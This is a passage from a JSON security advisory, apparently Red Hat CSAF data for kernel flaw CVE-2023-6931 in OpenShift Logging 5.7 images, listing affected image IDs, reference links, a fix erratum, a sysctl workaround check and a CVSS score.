"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6931"
},
{
"category": "external",
"summary": "RHBZ#2252731",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252731"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6931"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6931",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6931"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b"
}
],
"release_date": "2023-11-29T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "workaround",
"details": "It is not possible to trigger this issue with the default kernel.perf_event_paranoid sysctl value 2. You may check it with:\ncat /proc/sys/kernel/perf_event_paranoid",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
